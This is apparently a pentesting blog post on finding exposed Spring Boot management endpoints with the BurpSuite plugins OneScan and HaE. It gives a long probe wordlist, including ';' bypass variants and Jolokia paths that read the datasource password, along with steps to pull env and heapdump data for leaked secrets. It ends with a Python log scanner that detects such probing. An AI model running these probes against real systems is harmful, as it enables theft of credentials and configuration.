Preface

This post covers the BurpSuite plugins I use when pentesting Spring Boot applications and the approach for finding vulnerabilities. The focus is on locating specific files that expose leaked configuration.

Procedure

Install OneScan and HaE
2023-08-04T02:28:38.png
Open the OneScan Dashboard and enable Listen Proxy Message.
2023-08-04T02:29:10.png
Then, under Payload, click Clear and Paste the following probe paths:
2023-08-04T02:29:20.png

/api/swagger.json 
/v2/swagger.json 
/api/swagger.json 
/v2/api-docs 
/api-doc 
/swagger-resources 
/druid/index.html 
/services 
/admin 
/actuator 
/api/actuator 
/APPWebService 
/v3/api-docs 
/env 
/trace 
/api/v2/api-docs 
/v2/api-docs; 
/actuator; 
/js/ueditor/ueditor.config.js 
/nacos/index.html 
/jeecg-boot/ 
/ueditor/ueditor.config.js 
/getUserInfo 
/v1/api-docs 
/OfficeServer.jsp 
/APPWebService/AppService.asmx 
/js/config.js 
/env; 
/druid/login.html 
/druid/index.html 
/druid/basic.json 
/autoconfig 
/auditevents 
/configprops 
/dump 
/env 
/env/java.home 
/features 
/health 
/heapdump 
/logfile 
/loggers 
/jolokia 
/jolokia/list 
/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.password 
/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.url 
/mappings 
/metrics/mem 
/metrics/ 
/restart 
/trace 
/actuator/druid/login.html 
/actuator/autoconfig 
/actuator/auditevents 
/actuator/configprops 
/actuator/beans 
/actuator/dump 
/actuator/env 
/actuator/env/java.home 
/actuator/features 
/actuator/health 
/actuator/heapdump 
/actuator/info 
/actuator/logfile 
/actuator/loggers 
/actuator/jolokia 
/actuator/jolokia/list 
/actuator/shutdown 
/actuator/trace 
/nacos 
;/api/swagger.json 
;/v2/swagger.json 
;/api/swagger.json 
;/v2/api-docs 
;/api-doc 
;/swagger-resources 
;/druid/index.html 
;/services 
;/actuator 
;/api/actuator 
;/APPWebService 
;/v3/api-docs 
;/env 
;/trace 
;/api/v2/api-docs 
;/v2/api-docs; 
;/actuator; 
;/js/ueditor/ueditor.config.js 
;/nacos/index.html 
;/jeecg-boot/ 
;/ueditor/ueditor.config.js 
;/getUserInfo 
;/v1/api-docs 
;/OfficeServer.jsp 
;/js/config.js 
;/env; 
;/druid/login.html 
;/druid/index.html 
;/druid/basic.json 
;/autoconfig 
;/auditevents 
;/configprops 
;/dump 
;/env 
;/env/java.home 
;/features 
;/health 
;/heapdump 
;/logfile 
;/loggers 
;/jolokia 
;/jolokia/list 
;/jolokia/exec/org.springframework

Then, under Other, also load HaE.
2023-08-04T02:29:43.png
Switch to the HaE tab and add an entry under Rules.
2023-08-04T02:29:50.png
Set Regex to (\{\"\_links\"\:\{\"self), which matches the start of a Spring Boot Actuator JSON index response, and configure the rest as shown in the screenshot above.
Then go back to Proxy, open the browser and visit the page.
2023-08-04T02:29:56.png
The red highlight configured above is now visible.
2023-08-04T02:30:07.png
Check the contents; the important ones are env and heapdump.
2023-08-04T02:30:34.png
2023-08-04T02:30:40.png
Open the env URL and view it.
2023-08-04T02:30:50.png
Paste the result into VS Code and format it.
2023-08-04T02:40:08.png
Check whether it contains anything important.
For heapdump, use JDumpSpider to view the contents.
2023-08-04T02:31:01.png
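As a defender-side addition (not part of the original post, and not code from OneScan, HaE or JDumpSpider), the following Python script checks web-server access logs for requests to the management paths in the list above. It normalizes each request path so that the list's ';' variants (such as /actuator;/env and ;/env), percent-encoded forms and trailing slashes all fold to the same entry before matching; the log lines are constructed for the example and the log format is assumed to be the common log format.

```python
import re
from urllib.parse import unquote

# Paths from the wordlist above that leak configuration or control the service.
SENSITIVE_PREFIXES = (
    "/actuator/env", "/actuator/heapdump", "/actuator/jolokia",
    "/actuator/shutdown", "/actuator/restart", "/actuator/configprops",
    "/env", "/heapdump", "/jolokia", "/configprops", "/druid/index.html",
    "/druid/login.html", "/v2/api-docs", "/swagger-resources", "/nacos",
)

# Common log format: client ident user [time] "METHOD URI PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def normalize_path(uri: str) -> str:
    """Fold wordlist variants onto one path: drop the query string, percent-
    decode, strip ';...' matrix params from each segment ('/actuator;/env' and
    ';/env' become '/actuator/env' and '/env'), collapse slashes, lowercase."""
    path = unquote(uri.split("?", 1)[0])
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    return "/" + "/".join(s for s in segments if s).lower()

def is_sensitive(path: str) -> bool:
    return any(path == p or path.startswith(p + "/") for p in SENSITIVE_PREFIXES)

def scan_access_log(lines):
    """Return (ip, path, status) per request hitting a sensitive path; 404s still show probing."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = normalize_path(m.group("uri"))
        if is_sensitive(path):
            hits.append((m.group("ip"), path, int(m.group("status"))))
    return hits

# Constructed sample log lines (not from any real system).
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Aug/2023:02:30:50 +0000] "GET /actuator/env HTTP/1.1" 200 18342',
    '10.0.0.5 - - [04/Aug/2023:02:30:51 +0000] "GET /actuator;/heapdump HTTP/1.1" 200 52428800',
    '10.0.0.5 - - [04/Aug/2023:02:30:52 +0000] "GET ;/env HTTP/1.1" 404 0',
    '10.0.0.9 - - [04/Aug/2023:02:31:00 +0000] "GET /actuator/health HTTP/1.1" 200 15',
    '10.0.0.9 - - [04/Aug/2023:02:31:01 +0000] "GET /index.html?x=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [04/Aug/2023:02:31:05 +0000] "GET /%61ctuator/env/java.home HTTP/1.1" 200 77',
]
```

A 200 on any of these paths is an exposure to fix; repeated 404s or 401s from one client on the same paths are the reconnaissance pattern this post's scanner produces.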

Closing notes

This is mainly about finding the corresponding files and the leaked configuration in them. Links to the tools were placed at the corresponding points above for you to download.

Last modification: August 4, 2023